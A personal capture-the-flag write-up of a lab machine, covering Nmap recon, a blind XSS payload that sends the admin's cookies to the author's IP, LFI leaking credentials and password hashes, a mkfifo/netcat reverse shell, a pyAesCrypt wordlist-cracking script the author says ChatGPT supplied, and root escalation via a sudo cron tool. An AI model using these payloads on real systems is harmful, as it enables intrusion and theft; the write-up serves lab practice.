This is not a proper walkthrough it is just a writeup or you can say some personal notes i made while solving the machine.

Initial Recon

Nmap

nmap 10.10.11.88 -p8000,8001,22 -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 01:04 EDT
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 100.00% done; ETC: 01:04 (0:00:00 remaining)
Nmap scan report for 10.10.11.88
Host is up (0.12s latency).

PORT     STATE  SERVICE     VERSION
22/tcp   open   ssh         OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
8000/tcp open   http        Werkzeug httpd 3.1.3 (Python 3.12.7)
8001/tcp closed vcom-tunnel
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.57 seconds

I bypassed the client-side restriction by Burp’s match and replace rule from “isAdmin”:false to “isAdmin”:true. Managed to see the admin panel interface, but not perform any action

I discovered a /report_bug endpoint in the client-side source code. You can use various endpoint extractor tools, but I did it manually.

Blind XSS to Admin Account

Payload : <img src=x onerror=fetch(‘http://10.10.16.45/?cookie='+document.cookie)>

{“bugName”:”hello”,”bugDetails”:”<img src=x onerror=fetch(‘http://10.10.16.45/?cookie='+document.cookie)>"}

Found some users with an admin token

Admin Panel

On clicking Download Log to get the password of testuser, but got an error

LFI

☐ A Potential LFI Parameter here

☐ Tried SSRF also here, but it didn’t work

INFO FROM LFI

☐ Two Users mark and WEB

☐ Got the Location where the web is being hosted

☐ Dump ENV Variables and current user

☐ Credentials of Admin and Test User found db.json in config.py, which is the common config file along with app.py in Python servers.

{
            "username": "[email protected]",
            "password": "5d9c1d507a3f76af1e5c97a3ad1eaa31",
            "isAdmin": true,
            "displayId": "a1b2c3d4",
            "login_attempts": 0,
            "isTestuser": false,
            "failed_login_attempts": 0,
            "locked_until": null
        }
        {
            "username": "[email protected]",
            "password": "2c65c8d7bfbca32a3ed42596192384f6",
            "isAdmin": false,
            "displayId": "e5f6g7h8",
            "login_attempts": 0,
            "isTestuser": true,
            "failed_login_attempts": 0,
            "locked_until": null
        }

• Cracked the test user password

RCE on Apply Visual Transform from Test User

Gain the shell

;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.45 8888 >/tmp/f; = on target

rlwrap -f . -r nc -nvlp 8888 = on our system

Got a pty shell: python -c ‘import pty;pty.spawn(“/bin/bash”)’

PrivEsc To Mark

Got some info on the Machine

☐ Admin User password

CHROME_BINARY = "/usr/bin/google-chrome"
USERNAME = "[email protected]"
PASSWORD = "strongsandofbeach"
BYPASS_TOKEN = "K7Zg9vB$24NmW!q8xR0p%tL!"
APP_URL = "http://0.0.0.0:8000"

• I found this backup file, but it was encrypted, so I asked ChatGPT to help me crack this, and it gave me a script

1. python3 -m venv temp
2. source temp/bin/activate
3. pip install pyAesCrypt
4. python crack.py web_20250806_120723.zip.aes /usr/share/wordlists/rockyou.txt

#!/usr/bin/env python3
import pyAesCrypt
import sys
import os
if len(sys.argv) < 3:
    print("Usage: python crack.py file.zip.aes wordlist.txt [outdir]")
    sys.exit(1)
encfile = sys.argv[1]
wordlist = sys.argv[2]
outdir = sys.argv[3] if len(sys.argv) > 3 else "attempt_out"
os.makedirs(outdir, exist_ok=True)
# chunk size used by pyAesCrypt (default value).
bufferSize = 64 * 1024
total = 0
with open(wordlist, "r", errors="ignore") as f:
    for line in f:
        pwd = line.rstrip("\n\r")
        if not pwd:
            continue
        total += 1
        if total % 1000 == 0:
            print(f"Attempt #{total}: '{pwd[:30]}'")
        outpath = os.path.join(outdir, "temp_decrypted_output")
        try:
            # pyAesCrypt.decryptFile throws ValueError on wrong password (or IntegrityError)
            pyAesCrypt.decryptFile(encfile, outpath, pwd, bufferSize)
            print()
            print("Password Cracked")
            print(pwd)
            print("Decrypted output saved to:", outpath)
            sys.exit(0)
        except (ValueError, Exception) as e:
            # Wrong password will generally raise ValueError / IntegrityError
            # Remove any incomplete file
            if os.path.exists(outpath):
                try:
                    os.remove(outpath)
                except:
                    pass
            # continue trying
            continue
print("Password NOT found in the provided wordlist.")
sys.exit(2)

5. unzip attempt_out/temp_decrypted_output

6. cat web/db.json

• We got the password for Mark here

7. su mark and enter supersmash password when prompted

PrivEsc to Root

• Got some binary which Mark can run as sudo without a password

• It was a custom binary that could set cron jobs, so I did and set a cron job as root

1. sudo charcol shell

2. auto add — schedule “* * * * *” — command “cat /root/root.txt > /home/.flag2” — name “root_flag” — log-output /home/.flag

WE GOT THE FLAGS

!!!

Connect with me on linkedin maybe we will solve the machine together : https://www.linkedin.com/in/abhishek26gupta/